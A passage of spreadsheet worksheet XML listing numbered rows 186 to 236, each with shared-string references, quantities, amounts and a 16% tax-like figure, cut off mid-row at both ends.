      <c r="E186" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F186" s="238" t="s">
        <v>5117</v>
      </c>
      <c r="G186" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H186" s="10">
        <v>4</v>
      </c>
      <c r="I186" s="14">
        <v>1365.81</v>
      </c>
      <c r="J186" s="15">
        <v>218.528</v>
      </c>
      <c r="K186" s="16"/>
    </row>
    <row r="187" spans="2:11">
      <c r="B187" s="9">
        <v>183</v>
      </c>
      <c r="C187" s="238" t="s">
        <v>5118</v>
      </c>
      <c r="D187" s="238" t="s">
        <v>5119</v>
      </c>
      <c r="E187" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F187" s="238" t="s">
        <v>5117</v>
      </c>
      <c r="G187" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H187" s="10">
        <v>3</v>
      </c>
      <c r="I187" s="14">
        <v>2470.08</v>
      </c>
      <c r="J187" s="15">
        <v>395.2128</v>
      </c>
      <c r="K187" s="16"/>
    </row>
    <row r="188" spans="2:11">
      <c r="B188" s="9">
        <v>184</v>
      </c>
      <c r="C188" s="238" t="s">
        <v>5120</v>
      </c>
      <c r="D188" s="238" t="s">
        <v>5121</v>
      </c>
      <c r="E188" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F188" s="238" t="s">
        <v>5117</v>
      </c>
      <c r="G188" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H188" s="10">
        <v>1</v>
      </c>
      <c r="I188" s="14">
        <v>47</v>
      </c>
      <c r="J188" s="15">
        <v>7.52</v>
      </c>
      <c r="K188" s="16"/>
    </row>
    <row r="189" spans="2:11">
      <c r="B189" s="9">
        <v>185</v>
      </c>
      <c r="C189" s="238" t="s">
        <v>5122</v>
      </c>
      <c r="D189" s="238" t="s">
        <v>5123</v>
      </c>
      <c r="E189" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F189" s="238" t="s">
        <v>5117</v>
      </c>
      <c r="G189" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H189" s="10">
        <v>2</v>
      </c>
      <c r="I189" s="14">
        <v>153.85</v>
      </c>
      <c r="J189" s="15">
        <v>24.6176</v>
      </c>
      <c r="K189" s="16"/>
    </row>
    <row r="190" spans="2:11">
      <c r="B190" s="9">
        <v>186</v>
      </c>
      <c r="C190" s="238" t="s">
        <v>5124</v>
      </c>
      <c r="D190" s="238" t="s">
        <v>4996</v>
      </c>
      <c r="E190" s="238" t="s">
        <v>5125</v>
      </c>
      <c r="F190" s="238" t="s">
        <v>5117</v>
      </c>
      <c r="G190" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H190" s="10">
        <v>5</v>
      </c>
      <c r="I190" s="14">
        <v>42.74</v>
      </c>
      <c r="J190" s="15">
        <v>6.84</v>
      </c>
      <c r="K190" s="16"/>
    </row>
    <row r="191" spans="2:11">
      <c r="B191" s="9">
        <v>187</v>
      </c>
      <c r="C191" s="238" t="s">
        <v>5126</v>
      </c>
      <c r="D191" s="238" t="s">
        <v>5127</v>
      </c>
      <c r="E191" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F191" s="238" t="s">
        <v>5117</v>
      </c>
      <c r="G191" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H191" s="10">
        <v>1</v>
      </c>
      <c r="I191" s="14">
        <v>316.24</v>
      </c>
      <c r="J191" s="15">
        <v>50.5984</v>
      </c>
      <c r="K191" s="16"/>
    </row>
    <row r="192" spans="2:11">
      <c r="B192" s="9">
        <v>188</v>
      </c>
      <c r="C192" s="238" t="s">
        <v>5128</v>
      </c>
      <c r="D192" s="9"/>
      <c r="E192" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F192" s="238" t="s">
        <v>5129</v>
      </c>
      <c r="G192" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H192" s="10">
        <v>2</v>
      </c>
      <c r="I192" s="14">
        <v>854.7</v>
      </c>
      <c r="J192" s="15">
        <v>136.752</v>
      </c>
      <c r="K192" s="16"/>
    </row>
    <row r="193" spans="2:11">
      <c r="B193" s="9">
        <v>189</v>
      </c>
      <c r="C193" s="238" t="s">
        <v>5130</v>
      </c>
      <c r="D193" s="238" t="s">
        <v>5131</v>
      </c>
      <c r="E193" s="238" t="s">
        <v>5132</v>
      </c>
      <c r="F193" s="238" t="s">
        <v>5133</v>
      </c>
      <c r="G193" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H193" s="10">
        <v>1</v>
      </c>
      <c r="I193" s="14">
        <v>141.73</v>
      </c>
      <c r="J193" s="15">
        <v>22.6768</v>
      </c>
      <c r="K193" s="16"/>
    </row>
    <row r="194" spans="2:11">
      <c r="B194" s="9">
        <v>190</v>
      </c>
      <c r="C194" s="238" t="s">
        <v>5134</v>
      </c>
      <c r="D194" s="238" t="s">
        <v>5135</v>
      </c>
      <c r="E194" s="238" t="s">
        <v>5136</v>
      </c>
      <c r="F194" s="238" t="s">
        <v>5133</v>
      </c>
      <c r="G194" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H194" s="10">
        <v>4</v>
      </c>
      <c r="I194" s="14">
        <v>478.63</v>
      </c>
      <c r="J194" s="15">
        <v>76.5824</v>
      </c>
      <c r="K194" s="16"/>
    </row>
    <row r="195" spans="2:11">
      <c r="B195" s="9">
        <v>191</v>
      </c>
      <c r="C195" s="238" t="s">
        <v>5138</v>
      </c>
      <c r="D195" s="9"/>
      <c r="E195" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F195" s="238" t="s">
        <v>5139</v>
      </c>
      <c r="G195" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H195" s="10">
        <v>1</v>
      </c>
      <c r="I195" s="14">
        <v>1153.85</v>
      </c>
      <c r="J195" s="15">
        <v>0</v>
      </c>
      <c r="K195" s="16" t="s">
        <v>5140</v>
      </c>
    </row>
    <row r="196" spans="2:11">
      <c r="B196" s="9">
        <v>192</v>
      </c>
      <c r="C196" s="238" t="s">
        <v>5141</v>
      </c>
      <c r="D196" s="238" t="s">
        <v>5142</v>
      </c>
      <c r="E196" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F196" s="238" t="s">
        <v>5143</v>
      </c>
      <c r="G196" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H196" s="10">
        <v>2</v>
      </c>
      <c r="I196" s="14">
        <v>521.37</v>
      </c>
      <c r="J196" s="15">
        <v>83.4208</v>
      </c>
      <c r="K196" s="16"/>
    </row>
    <row r="197" spans="2:11">
      <c r="B197" s="9">
        <v>193</v>
      </c>
      <c r="C197" s="238" t="s">
        <v>5144</v>
      </c>
      <c r="D197" s="238" t="s">
        <v>5145</v>
      </c>
      <c r="E197" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F197" s="238" t="s">
        <v>5147</v>
      </c>
      <c r="G197" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H197" s="10">
        <v>1</v>
      </c>
      <c r="I197" s="14">
        <v>51.28</v>
      </c>
      <c r="J197" s="15">
        <v>8.2048</v>
      </c>
      <c r="K197" s="16"/>
    </row>
    <row r="198" spans="2:11">
      <c r="B198" s="9">
        <v>194</v>
      </c>
      <c r="C198" s="238" t="s">
        <v>5148</v>
      </c>
      <c r="D198" s="9"/>
      <c r="E198" s="238" t="s">
        <v>5149</v>
      </c>
      <c r="F198" s="238" t="s">
        <v>5143</v>
      </c>
      <c r="G198" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H198" s="10">
        <v>2</v>
      </c>
      <c r="I198" s="14">
        <v>700.85</v>
      </c>
      <c r="J198" s="15">
        <v>112.1376</v>
      </c>
      <c r="K198" s="16"/>
    </row>
    <row r="199" spans="2:11">
      <c r="B199" s="9">
        <v>195</v>
      </c>
      <c r="C199" s="238" t="s">
        <v>5150</v>
      </c>
      <c r="D199" s="238" t="s">
        <v>5151</v>
      </c>
      <c r="E199" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F199" s="238" t="s">
        <v>5152</v>
      </c>
      <c r="G199" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H199" s="10">
        <v>2</v>
      </c>
      <c r="I199" s="14">
        <v>752.14</v>
      </c>
      <c r="J199" s="15">
        <v>120.3424</v>
      </c>
      <c r="K199" s="16"/>
    </row>
    <row r="200" spans="2:11">
      <c r="B200" s="9">
        <v>196</v>
      </c>
      <c r="C200" s="238" t="s">
        <v>5153</v>
      </c>
      <c r="D200" s="238" t="s">
        <v>5154</v>
      </c>
      <c r="E200" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F200" s="238" t="s">
        <v>5152</v>
      </c>
      <c r="G200" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H200" s="10">
        <v>1</v>
      </c>
      <c r="I200" s="14">
        <v>2162.39</v>
      </c>
      <c r="J200" s="15">
        <v>345.9824</v>
      </c>
      <c r="K200" s="16"/>
    </row>
    <row r="201" spans="2:11">
      <c r="B201" s="9">
        <v>197</v>
      </c>
      <c r="C201" s="238" t="s">
        <v>5155</v>
      </c>
      <c r="D201" s="238" t="s">
        <v>5156</v>
      </c>
      <c r="E201" s="238" t="s">
        <v>5157</v>
      </c>
      <c r="F201" s="238" t="s">
        <v>5152</v>
      </c>
      <c r="G201" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H201" s="10">
        <v>1</v>
      </c>
      <c r="I201" s="14">
        <v>150.99</v>
      </c>
      <c r="J201" s="15">
        <v>24.1584</v>
      </c>
      <c r="K201" s="16"/>
    </row>
    <row r="202" spans="2:11">
      <c r="B202" s="9">
        <v>198</v>
      </c>
      <c r="C202" s="238" t="s">
        <v>5158</v>
      </c>
      <c r="D202" s="238" t="s">
        <v>5159</v>
      </c>
      <c r="E202" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F202" s="238" t="s">
        <v>5152</v>
      </c>
      <c r="G202" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H202" s="10">
        <v>4</v>
      </c>
      <c r="I202" s="14">
        <v>1150.99</v>
      </c>
      <c r="J202" s="15">
        <v>184.16</v>
      </c>
      <c r="K202" s="16"/>
    </row>
    <row r="203" spans="2:11">
      <c r="B203" s="9">
        <v>199</v>
      </c>
      <c r="C203" s="238" t="s">
        <v>5160</v>
      </c>
      <c r="D203" s="9"/>
      <c r="E203" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F203" s="238" t="s">
        <v>5161</v>
      </c>
      <c r="G203" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H203" s="10">
        <v>2</v>
      </c>
      <c r="I203" s="14">
        <v>2561.25</v>
      </c>
      <c r="J203" s="15">
        <v>409.8016</v>
      </c>
      <c r="K203" s="16"/>
    </row>
    <row r="204" spans="2:11">
      <c r="B204" s="9">
        <v>200</v>
      </c>
      <c r="C204" s="238" t="s">
        <v>5162</v>
      </c>
      <c r="D204" s="238" t="s">
        <v>5163</v>
      </c>
      <c r="E204" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F204" s="238" t="s">
        <v>5152</v>
      </c>
      <c r="G204" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H204" s="10">
        <v>2</v>
      </c>
      <c r="I204" s="14">
        <v>51.28</v>
      </c>
      <c r="J204" s="15">
        <v>8.2048</v>
      </c>
      <c r="K204" s="16"/>
    </row>
    <row r="205" spans="2:11">
      <c r="B205" s="9">
        <v>201</v>
      </c>
      <c r="C205" s="238" t="s">
        <v>5164</v>
      </c>
      <c r="D205" s="238" t="s">
        <v>5165</v>
      </c>
      <c r="E205" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F205" s="238" t="s">
        <v>5166</v>
      </c>
      <c r="G205" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H205" s="10">
        <v>1</v>
      </c>
      <c r="I205" s="14">
        <v>2350.43</v>
      </c>
      <c r="J205" s="15">
        <v>376.0688</v>
      </c>
      <c r="K205" s="16"/>
    </row>
    <row r="206" spans="2:11">
      <c r="B206" s="9">
        <v>202</v>
      </c>
      <c r="C206" s="238" t="s">
        <v>5167</v>
      </c>
      <c r="D206" s="238" t="s">
        <v>5168</v>
      </c>
      <c r="E206" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F206" s="238" t="s">
        <v>5169</v>
      </c>
      <c r="G206" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H206" s="10">
        <v>2</v>
      </c>
      <c r="I206" s="14">
        <v>1880.34</v>
      </c>
      <c r="J206" s="15">
        <v>300.8544</v>
      </c>
      <c r="K206" s="16"/>
    </row>
    <row r="207" spans="2:11">
      <c r="B207" s="9">
        <v>203</v>
      </c>
      <c r="C207" s="238" t="s">
        <v>5170</v>
      </c>
      <c r="D207" s="238" t="s">
        <v>5171</v>
      </c>
      <c r="E207" s="238" t="s">
        <v>5157</v>
      </c>
      <c r="F207" s="238" t="s">
        <v>5166</v>
      </c>
      <c r="G207" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H207" s="10">
        <v>4</v>
      </c>
      <c r="I207" s="14">
        <v>529.92</v>
      </c>
      <c r="J207" s="15">
        <v>84.7872</v>
      </c>
      <c r="K207" s="16"/>
    </row>
    <row r="208" spans="2:11">
      <c r="B208" s="9">
        <v>204</v>
      </c>
      <c r="C208" s="238" t="s">
        <v>5172</v>
      </c>
      <c r="D208" s="9"/>
      <c r="E208" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F208" s="238" t="s">
        <v>4722</v>
      </c>
      <c r="G208" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H208" s="10">
        <v>3</v>
      </c>
      <c r="I208" s="14">
        <v>1696.59</v>
      </c>
      <c r="J208" s="15">
        <v>271.4544</v>
      </c>
      <c r="K208" s="16"/>
    </row>
    <row r="209" spans="2:11">
      <c r="B209" s="9">
        <v>205</v>
      </c>
      <c r="C209" s="238" t="s">
        <v>5173</v>
      </c>
      <c r="D209" s="9"/>
      <c r="E209" s="238" t="s">
        <v>5174</v>
      </c>
      <c r="F209" s="238" t="s">
        <v>5175</v>
      </c>
      <c r="G209" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H209" s="10">
        <v>4</v>
      </c>
      <c r="I209" s="14">
        <v>3162.39</v>
      </c>
      <c r="J209" s="15">
        <v>505.984</v>
      </c>
      <c r="K209" s="16"/>
    </row>
    <row r="210" spans="2:11">
      <c r="B210" s="9">
        <v>206</v>
      </c>
      <c r="C210" s="238" t="s">
        <v>5176</v>
      </c>
      <c r="D210" s="9"/>
      <c r="E210" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F210" s="238" t="s">
        <v>5177</v>
      </c>
      <c r="G210" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H210" s="10">
        <v>2</v>
      </c>
      <c r="I210" s="14">
        <v>2051.29</v>
      </c>
      <c r="J210" s="15">
        <v>328.208</v>
      </c>
      <c r="K210" s="16"/>
    </row>
    <row r="211" spans="2:11">
      <c r="B211" s="9">
        <v>207</v>
      </c>
      <c r="C211" s="238" t="s">
        <v>5178</v>
      </c>
      <c r="D211" s="9"/>
      <c r="E211" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F211" s="238" t="s">
        <v>5177</v>
      </c>
      <c r="G211" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H211" s="10">
        <v>2</v>
      </c>
      <c r="I211" s="14">
        <v>581.2</v>
      </c>
      <c r="J211" s="15">
        <v>92.992</v>
      </c>
      <c r="K211" s="16"/>
    </row>
    <row r="212" spans="2:11">
      <c r="B212" s="9">
        <v>208</v>
      </c>
      <c r="C212" s="238" t="s">
        <v>5179</v>
      </c>
      <c r="D212" s="9"/>
      <c r="E212" s="238" t="s">
        <v>5157</v>
      </c>
      <c r="F212" s="238" t="s">
        <v>5177</v>
      </c>
      <c r="G212" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H212" s="10">
        <v>5</v>
      </c>
      <c r="I212" s="14">
        <v>495.72</v>
      </c>
      <c r="J212" s="15">
        <v>79.312</v>
      </c>
      <c r="K212" s="16"/>
    </row>
    <row r="213" spans="2:11">
      <c r="B213" s="9">
        <v>209</v>
      </c>
      <c r="C213" s="238" t="s">
        <v>5180</v>
      </c>
      <c r="D213" s="238" t="s">
        <v>4728</v>
      </c>
      <c r="E213" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F213" s="238" t="s">
        <v>5177</v>
      </c>
      <c r="G213" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H213" s="10">
        <v>1</v>
      </c>
      <c r="I213" s="14">
        <v>1588.31</v>
      </c>
      <c r="J213" s="15">
        <v>254.1296</v>
      </c>
      <c r="K213" s="16"/>
    </row>
    <row r="214" spans="2:11">
      <c r="B214" s="9">
        <v>210</v>
      </c>
      <c r="C214" s="238" t="s">
        <v>5181</v>
      </c>
      <c r="D214" s="9"/>
      <c r="E214" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F214" s="238" t="s">
        <v>5177</v>
      </c>
      <c r="G214" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H214" s="10">
        <v>2</v>
      </c>
      <c r="I214" s="14">
        <v>700.85</v>
      </c>
      <c r="J214" s="15">
        <v>112.1376</v>
      </c>
      <c r="K214" s="16"/>
    </row>
    <row r="215" spans="2:11">
      <c r="B215" s="9">
        <v>211</v>
      </c>
      <c r="C215" s="238" t="s">
        <v>5182</v>
      </c>
      <c r="D215" s="238" t="s">
        <v>5183</v>
      </c>
      <c r="E215" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F215" s="238" t="s">
        <v>5184</v>
      </c>
      <c r="G215" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H215" s="10">
        <v>2</v>
      </c>
      <c r="I215" s="14">
        <v>940.16</v>
      </c>
      <c r="J215" s="15">
        <v>150.4256</v>
      </c>
      <c r="K215" s="16"/>
    </row>
    <row r="216" spans="2:11">
      <c r="B216" s="9">
        <v>212</v>
      </c>
      <c r="C216" s="238" t="s">
        <v>5185</v>
      </c>
      <c r="D216" s="238" t="s">
        <v>5186</v>
      </c>
      <c r="E216" s="238" t="s">
        <v>5017</v>
      </c>
      <c r="F216" s="238" t="s">
        <v>5184</v>
      </c>
      <c r="G216" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H216" s="10">
        <v>1</v>
      </c>
      <c r="I216" s="14">
        <v>1968.54</v>
      </c>
      <c r="J216" s="15">
        <v>314.9664</v>
      </c>
      <c r="K216" s="16"/>
    </row>
    <row r="217" spans="2:11">
      <c r="B217" s="9">
        <v>213</v>
      </c>
      <c r="C217" s="238" t="s">
        <v>5187</v>
      </c>
      <c r="D217" s="9"/>
      <c r="E217" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F217" s="238" t="s">
        <v>5188</v>
      </c>
      <c r="G217" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H217" s="10">
        <v>2</v>
      </c>
      <c r="I217" s="14">
        <v>226.5</v>
      </c>
      <c r="J217" s="15">
        <v>36.24</v>
      </c>
      <c r="K217" s="16"/>
    </row>
    <row r="218" spans="2:11">
      <c r="B218" s="9">
        <v>214</v>
      </c>
      <c r="C218" s="238" t="s">
        <v>5189</v>
      </c>
      <c r="D218" s="9"/>
      <c r="E218" s="238" t="s">
        <v>5190</v>
      </c>
      <c r="F218" s="238" t="s">
        <v>5188</v>
      </c>
      <c r="G218" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H218" s="10">
        <v>2</v>
      </c>
      <c r="I218" s="14">
        <v>3418.84</v>
      </c>
      <c r="J218" s="15">
        <v>547.0144</v>
      </c>
      <c r="K218" s="16"/>
    </row>
    <row r="219" spans="2:11">
      <c r="B219" s="9">
        <v>215</v>
      </c>
      <c r="C219" s="238" t="s">
        <v>5191</v>
      </c>
      <c r="D219" s="9"/>
      <c r="E219" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F219" s="238" t="s">
        <v>5184</v>
      </c>
      <c r="G219" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H219" s="10">
        <v>3</v>
      </c>
      <c r="I219" s="14">
        <v>166.64</v>
      </c>
      <c r="J219" s="15">
        <v>26.664</v>
      </c>
      <c r="K219" s="16"/>
    </row>
    <row r="220" spans="2:11">
      <c r="B220" s="9">
        <v>216</v>
      </c>
      <c r="C220" s="238" t="s">
        <v>5193</v>
      </c>
      <c r="D220" s="238" t="s">
        <v>5194</v>
      </c>
      <c r="E220" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F220" s="238" t="s">
        <v>5184</v>
      </c>
      <c r="G220" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H220" s="10">
        <v>1</v>
      </c>
      <c r="I220" s="14">
        <v>2236.95</v>
      </c>
      <c r="J220" s="15">
        <v>357.912</v>
      </c>
      <c r="K220" s="16"/>
    </row>
    <row r="221" spans="2:11">
      <c r="B221" s="9">
        <v>217</v>
      </c>
      <c r="C221" s="238" t="s">
        <v>5195</v>
      </c>
      <c r="D221" s="238" t="s">
        <v>5196</v>
      </c>
      <c r="E221" s="238" t="s">
        <v>5197</v>
      </c>
      <c r="F221" s="238" t="s">
        <v>5184</v>
      </c>
      <c r="G221" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H221" s="10"/>
      <c r="I221" s="17"/>
      <c r="J221" s="15">
        <v>0</v>
      </c>
      <c r="K221" s="16"/>
    </row>
    <row r="222" spans="2:11">
      <c r="B222" s="9">
        <v>218</v>
      </c>
      <c r="C222" s="238" t="s">
        <v>5198</v>
      </c>
      <c r="D222" s="9"/>
      <c r="E222" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F222" s="238" t="s">
        <v>5199</v>
      </c>
      <c r="G222" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H222" s="10">
        <v>8</v>
      </c>
      <c r="I222" s="14">
        <v>4159.55</v>
      </c>
      <c r="J222" s="15">
        <v>665.5232</v>
      </c>
      <c r="K222" s="16"/>
    </row>
    <row r="223" spans="2:11">
      <c r="B223" s="9">
        <v>219</v>
      </c>
      <c r="C223" s="238" t="s">
        <v>5200</v>
      </c>
      <c r="D223" s="9"/>
      <c r="E223" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F223" s="238" t="s">
        <v>5201</v>
      </c>
      <c r="G223" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H223" s="9"/>
      <c r="I223" s="17"/>
      <c r="J223" s="15">
        <v>0</v>
      </c>
      <c r="K223" s="16"/>
    </row>
    <row r="224" spans="2:11">
      <c r="B224" s="9">
        <v>220</v>
      </c>
      <c r="C224" s="238" t="s">
        <v>5202</v>
      </c>
      <c r="D224" s="9"/>
      <c r="E224" s="238" t="s">
        <v>5203</v>
      </c>
      <c r="F224" s="238" t="s">
        <v>5201</v>
      </c>
      <c r="G224" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H224" s="10">
        <v>1</v>
      </c>
      <c r="I224" s="14">
        <v>897.43</v>
      </c>
      <c r="J224" s="15">
        <v>143.5888</v>
      </c>
      <c r="K224" s="16"/>
    </row>
    <row r="225" spans="2:11">
      <c r="B225" s="9">
        <v>221</v>
      </c>
      <c r="C225" s="238" t="s">
        <v>5204</v>
      </c>
      <c r="D225" s="9"/>
      <c r="E225" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F225" s="238" t="s">
        <v>5201</v>
      </c>
      <c r="G225" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H225" s="10">
        <v>1</v>
      </c>
      <c r="I225" s="14">
        <v>188.03</v>
      </c>
      <c r="J225" s="15">
        <v>30.0848</v>
      </c>
      <c r="K225" s="16"/>
    </row>
    <row r="226" spans="2:11">
      <c r="B226" s="9">
        <v>222</v>
      </c>
      <c r="C226" s="238" t="s">
        <v>5205</v>
      </c>
      <c r="D226" s="9"/>
      <c r="E226" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F226" s="238" t="s">
        <v>5201</v>
      </c>
      <c r="G226" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H226" s="10">
        <v>2</v>
      </c>
      <c r="I226" s="14">
        <v>871.79</v>
      </c>
      <c r="J226" s="15">
        <v>139.488</v>
      </c>
      <c r="K226" s="16"/>
    </row>
    <row r="227" spans="2:11">
      <c r="B227" s="9">
        <v>223</v>
      </c>
      <c r="C227" s="238" t="s">
        <v>5206</v>
      </c>
      <c r="D227" s="9"/>
      <c r="E227" s="238" t="s">
        <v>5207</v>
      </c>
      <c r="F227" s="238" t="s">
        <v>5208</v>
      </c>
      <c r="G227" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H227" s="10">
        <v>2</v>
      </c>
      <c r="I227" s="14">
        <v>4316.24</v>
      </c>
      <c r="J227" s="15">
        <v>690.5984</v>
      </c>
      <c r="K227" s="16"/>
    </row>
    <row r="228" spans="2:11">
      <c r="B228" s="9">
        <v>224</v>
      </c>
      <c r="C228" s="238" t="s">
        <v>5209</v>
      </c>
      <c r="D228" s="9"/>
      <c r="E228" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F228" s="238" t="s">
        <v>3696</v>
      </c>
      <c r="G228" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H228" s="10">
        <v>1</v>
      </c>
      <c r="I228" s="14">
        <v>51.28</v>
      </c>
      <c r="J228" s="15">
        <v>8.2048</v>
      </c>
      <c r="K228" s="16"/>
    </row>
    <row r="229" spans="2:11">
      <c r="B229" s="9">
        <v>225</v>
      </c>
      <c r="C229" s="238" t="s">
        <v>5210</v>
      </c>
      <c r="D229" s="238" t="s">
        <v>5211</v>
      </c>
      <c r="E229" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F229" s="238" t="s">
        <v>3696</v>
      </c>
      <c r="G229" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H229" s="10">
        <v>2</v>
      </c>
      <c r="I229" s="14">
        <v>810.49</v>
      </c>
      <c r="J229" s="15">
        <v>129.68</v>
      </c>
      <c r="K229" s="16"/>
    </row>
    <row r="230" spans="2:11">
      <c r="B230" s="9">
        <v>226</v>
      </c>
      <c r="C230" s="238" t="s">
        <v>5212</v>
      </c>
      <c r="D230" s="238" t="s">
        <v>5213</v>
      </c>
      <c r="E230" s="238" t="s">
        <v>5214</v>
      </c>
      <c r="F230" s="238" t="s">
        <v>4959</v>
      </c>
      <c r="G230" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H230" s="10">
        <v>2</v>
      </c>
      <c r="I230" s="14">
        <v>76.92</v>
      </c>
      <c r="J230" s="15">
        <v>12.3072</v>
      </c>
      <c r="K230" s="16"/>
    </row>
    <row r="231" spans="2:11">
      <c r="B231" s="9">
        <v>227</v>
      </c>
      <c r="C231" s="238" t="s">
        <v>5215</v>
      </c>
      <c r="D231" s="238" t="s">
        <v>5216</v>
      </c>
      <c r="E231" s="238" t="s">
        <v>5217</v>
      </c>
      <c r="F231" s="238" t="s">
        <v>4959</v>
      </c>
      <c r="G231" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H231" s="10">
        <v>2</v>
      </c>
      <c r="I231" s="14">
        <v>1846.15</v>
      </c>
      <c r="J231" s="15">
        <v>295.3856</v>
      </c>
      <c r="K231" s="16"/>
    </row>
    <row r="232" spans="2:11">
      <c r="B232" s="9">
        <v>228</v>
      </c>
      <c r="C232" s="238" t="s">
        <v>5218</v>
      </c>
      <c r="D232" s="238" t="s">
        <v>5219</v>
      </c>
      <c r="E232" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F232" s="238" t="s">
        <v>4959</v>
      </c>
      <c r="G232" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H232" s="10">
        <v>7</v>
      </c>
      <c r="I232" s="14">
        <v>999.14</v>
      </c>
      <c r="J232" s="15">
        <v>159.8576</v>
      </c>
      <c r="K232" s="16"/>
    </row>
    <row r="233" spans="2:11">
      <c r="B233" s="9">
        <v>229</v>
      </c>
      <c r="C233" s="238" t="s">
        <v>5220</v>
      </c>
      <c r="D233" s="238" t="s">
        <v>5221</v>
      </c>
      <c r="E233" s="238" t="s">
        <v>5222</v>
      </c>
      <c r="F233" s="238" t="s">
        <v>4959</v>
      </c>
      <c r="G233" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H233" s="10">
        <v>10</v>
      </c>
      <c r="I233" s="14">
        <v>735.05</v>
      </c>
      <c r="J233" s="15">
        <v>117.616</v>
      </c>
      <c r="K233" s="16"/>
    </row>
    <row r="234" spans="2:11">
      <c r="B234" s="9">
        <v>230</v>
      </c>
      <c r="C234" s="238" t="s">
        <v>5223</v>
      </c>
      <c r="D234" s="9"/>
      <c r="E234" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F234" s="238" t="s">
        <v>4959</v>
      </c>
      <c r="G234" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H234" s="10">
        <v>4</v>
      </c>
      <c r="I234" s="14">
        <v>1196.57</v>
      </c>
      <c r="J234" s="15">
        <v>191.4496</v>
      </c>
      <c r="K234" s="16"/>
    </row>
    <row r="235" spans="2:11">
      <c r="B235" s="9">
        <v>231</v>
      </c>
      <c r="C235" s="238" t="s">
        <v>5224</v>
      </c>
      <c r="D235" s="238" t="s">
        <v>5225</v>
      </c>
      <c r="E235" s="238" t="s">
        <v>4997</v>
      </c>
      <c r="F235" s="238" t="s">
        <v>4959</v>
      </c>
      <c r="G235" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H235" s="10">
        <v>2</v>
      </c>
      <c r="I235" s="14">
        <v>85.47</v>
      </c>
      <c r="J235" s="15">
        <v>13.6768</v>
      </c>
      <c r="K235" s="16"/>
    </row>
    <row r="236" spans="2:11">
      <c r="B236" s="9">
        <v>232</v>
      </c>
      <c r="C236" s="238" t="s">
        <v>5226</v>
      </c>
      <c r="D236" s="9"/>
      <c r="E236" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F236" s="9"/>
